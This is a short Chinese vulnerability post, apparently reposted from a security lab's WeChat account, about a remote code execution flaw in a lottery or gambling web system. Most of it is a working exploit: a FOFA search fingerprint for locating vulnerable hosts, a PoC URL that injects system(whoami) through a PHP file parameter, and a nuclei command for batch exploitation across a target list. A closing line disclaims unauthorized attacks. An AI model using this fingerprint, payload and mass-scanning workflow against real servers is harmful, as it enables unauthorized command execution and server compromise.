0x01 漏洞描述
网络赌博是指通过互联网手段(非法赌博网站、博彩App、微信群等)进行的赌博活动。由于网络赌博不合法,资金不受法律保护,有很多“出老千”的行为,很多人被骗后往往不敢报警,导致家破人亡,所以打击赌博,刻不容缓。某菠菜系统系统存在任意代码执行漏洞,攻击者通过漏洞可以执行任意命令,导致服务器失陷。
0x02 漏洞复现
fofa:newindex/static/js/16070610231968312.js
1.执行whoami命令的POC,返回用户名
http://{{Hostname}}/lib/classes/googleChart/markers/GoogleChartMapMarker.php?google88990=system(whoami);
2.nuclei批量验证脚本已发表于知识星球
nuclei.exe -t Laojiumen_Caipiao_RCE.yaml -l subs.txt -stats
(注:本文章为技术分享,禁止任何非授权攻击行为)
本文转载自公众号: 融云攻防实验室,原文地址:某彩票 任意代码执行漏洞(未公布)
THE END
暂无评论内容